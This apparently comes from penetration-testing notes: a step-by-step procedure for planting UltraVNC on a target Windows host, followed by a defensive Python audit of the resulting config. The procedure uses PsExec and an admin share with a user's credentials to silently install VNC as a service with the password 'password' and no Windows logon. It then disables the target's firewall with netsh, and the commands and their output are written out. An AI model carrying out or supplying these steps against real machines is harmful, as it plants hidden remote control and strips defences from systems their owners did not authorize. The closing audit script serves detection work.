• From a Windows system:
    • Download PsExec: http://technet.microsoft.com/en-us/sysinternals/bb897553
  • From a Linux system:
  • Download UltraVNC:
  • Copy the UltraVNC installation binary to the target Windows system using Windows filesharing
    net use \\targethost\c$ /user:jdoe
    copy UltraVNC_1.0.9.6.1_Setup.exe \\targethost\c$\
    
  • Install UltraVNC with the “/verysilent” argument
    psexec \\targethost -u jdoe -i C:\UltraVNC_1.0.9.6.1_Setup.exe /verysilent
    
    PsExec v1.98 - Execute processes remotely
    Copyright (C) 2001-2010 Mark Russinovich
    Sysinternals - www.sysinternals.com
    
    Password:
    
    C:\UltraVNC_1.0.9.6.1_Setup.exe exited on 192.168.0.10 with error 0.
    
  • Create a local configuration file for UltraVNC. This can be done either by installing your own copy and using its config file, or by using the text below. The configuration file is called “ultravnc.ini”
    [Permissions]
    [admin]
    FileTransferEnabled=1
    FTUserImpersonation=1
    BlankMonitorEnabled=1
    BlankInputsOnly=0
    CaptureAlphaBlending=0
    BlackAlphaBlending=0
    DefaultScale=1
    UseDSMPlugin=0
    DSMPlugin=
    DSMPluginConfig=
    primary=1
    secondary=0
    SocketConnect=1
    HTTPConnect=1
    XDMCPConnect=0
    AutoPortSelect=0
    InputsEnabled=1
    LocalInputsDisabled=0
    IdleTimeout=0
    EnableJapInput=0
    QuerySetting=2
    QueryTimeout=10
    QueryAccept=0
    LockSetting=0
    RemoveWallpaper=1
    RemoveEffects=0
    RemoveFontSmoothing=0
    RemoveAero=1
    DebugMode=0
    Avilog=0
    path=C:\Program Files\UltraVNC
    DebugLevel=0
    AllowLoopback=0
    LoopbackOnly=0
    AllowShutdown=1
    AllowProperties=1
    AllowEditClients=1
    FileTransferTimeout=30
    KeepAliveInterval=5
    SocketKeepAliveTimeout=10000
    DisableTrayIcon=0
    MSLogonRequired=0
    NewMSLogon=0
    ConnectPriority=0
    PortNumber=5900
    HTTPPortNumber=5800
    [ultravnc]
    ; both passwords are "password"
    passwd=DBD83CFD727A145800
    passwd2=DBD83CFD727A145800
    
  • Copy the new configuration file to the target Windows machine
    copy ultravnc.ini "\\targethost\c$\Program Files\UltraVNC\"
    
  • Install UltraVNC as a Windows service on the target Windows machine
    psexec \\targethost -u jdoe -i "C:\Program Files\UltraVNC\winvnc.exe" -install
    
    PsExec v1.98 - Execute processes remotely
    Copyright (C) 2001-2010 Mark Russinovich
    Sysinternals - www.sysinternals.com
    
    Password:
    
    C:\Program Files\UltraVNC\winvnc.exe exited on 192.168.0.10 with error code 0.
    
  • If the target Windows machine has its Windows firewall enabled and blocking the port, you can disable it
    psexec \\targethost -u jdoe -i netsh firewall set opmode disable
    
  • You should now be able to initiate a VNC connection to the target using the password “password”
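
The ultravnc.ini pushed in the configuration step above carries several settings an administrator or incident responder would want flagged when this file turns up on a host. The following is an added example, not part of the original procedure or of UltraVNC itself: a small audit of the file, where the function name `audit_ultravnc_ini`, the `ADMIN_CHECKS` selection and the finding texts are this example's own, and the sample input is a constructed subset of the page's file.

```python
import configparser

# Stored value the page gives for the password "password" (from its ultravnc.ini).
PAGE_WEAK_PASSWD = "DBD83CFD727A145800"

# Constructed sample: the security-relevant subset of the page's ultravnc.ini.
SAMPLE_INI = r"""
[Permissions]
[admin]
FileTransferEnabled=1
UseDSMPlugin=0
HTTPConnect=1
DisableTrayIcon=0
MSLogonRequired=0
path=C:\Program Files\UltraVNC
[ultravnc]
; both passwords are "password"
passwd=DBD83CFD727A145800
passwd2=DBD83CFD727A145800
"""

# (key in [admin], risky value, finding text); selection and wording are this example's.
ADMIN_CHECKS = [
    ("MSLogonRequired", "0", "Windows logon not required; access rests on the VNC password alone"),
    ("UseDSMPlugin", "0", "no DSM plugin in use; the session is not encrypted by a plugin"),
    ("HTTPConnect", "1", "HTTP (Java viewer) listener enabled in addition to the VNC port"),
    ("FileTransferEnabled", "1", "file transfer enabled for remote viewers"),
    ("DisableTrayIcon", "1", "tray icon hidden from the console user"),
]

def audit_ultravnc_ini(text):
    """Return a list of (setting, finding) tuples for risky values in an ultravnc.ini."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(text)
    findings = []
    for key, risky, msg in ADMIN_CHECKS:
        if cp.get("admin", key, fallback="").strip() == risky:
            findings.append((key, msg))
    pw = cp.get("ultravnc", "passwd", fallback="").strip().upper()
    pw2 = cp.get("ultravnc", "passwd2", fallback="").strip().upper()
    if pw == PAGE_WEAK_PASSWD:
        findings.append(("passwd", 'matches the stored form of "password" shown on this page'))
    if pw and pw == pw2:  # passwd2 is read here as the view-only password
        findings.append(("passwd2", "view-only password is identical to the full-control password"))
    return findings

if __name__ == "__main__":
    for setting, finding in audit_ultravnc_ini(SAMPLE_INI):
        print(f"[!] {setting}: {finding}")
```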